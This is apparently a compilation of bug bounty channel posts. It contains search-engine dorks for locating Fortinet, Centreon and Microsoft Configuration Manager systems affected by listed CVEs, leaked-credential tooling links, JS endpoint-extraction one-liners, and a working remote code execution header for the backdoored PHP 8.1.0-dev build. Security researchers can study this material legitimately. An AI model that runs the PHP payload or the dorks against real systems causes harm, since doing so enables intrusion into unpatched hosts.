Where are the reactions?
HUNTER: product.name="Microsoft Configuration Manager Remote Control service"
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468
#Microsoft #infosec #infosecurity #OSINT #Vulnerability
Network_Security_VAPT_Checklist.pdf
151.6 KB
Network Security VAPT Checklist
A website where you can search for known CSP bypass gadgets to exploit XSS.
Find Leaked Credentials Using Google Chrome DevTools (The Best Way)
https://github.com/h4x0r-dz/Leaked-Credentials
Your support is my energy! Every reaction inspires me to dig deeper, find exclusive tools, and craft the best resources just for you.
OSCE³ and OSEE Study Guide
Checkout on GitHub
https://github.com/CyberSecurityUP/OSCE3-Complete-Guide
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbountytips #rce #sqli #cybersecurity
CVE-2024-55573, -53923: SQLi in Centreon, 9.1 rating
The vulnerabilities allow an attacker with high privileges to perform SQL injection into a form for uploading media.
Search at Netlas.io:
Link: https://nt.ls/NETLB
Dork: http.favicon.hash_sha256:795c0f8c1ff23b992d6ccb91df5e6488d4c259585da58b2e2f8eeee71147516a OR http.favicon.hash_sha256:c95e0dc8a2cc9a45d29c5381e62e48bde88f661408d4b811e72933fa7da32d4e
Vendor's advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2024-55573-centreon-web-critical-severity-4264
Fortinet FortiOS Authentication Bypass CVE-2024-55591
Query:
HUNTER: product.name="Fortinet Firewall"
FOFA: product="FORTINET-Firewall"
SHODAN: instances running fortigate:
http.favicon.hash:945408572
ZoomEye Dork: app="Fortinet Firewall"
#BugBounty #CyberSecurity
Extract all endpoints from a JS file and take your bug
Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | grep -Eo "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
Method two
cat JS.txt | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9?&=\/\-#.]*(?=(\"|\'|\`))" | sort -u | tee endpoints.txt
#infosec #cybersec #bugbountytips
Config Repo: https://github.com/shellvik/shvbox/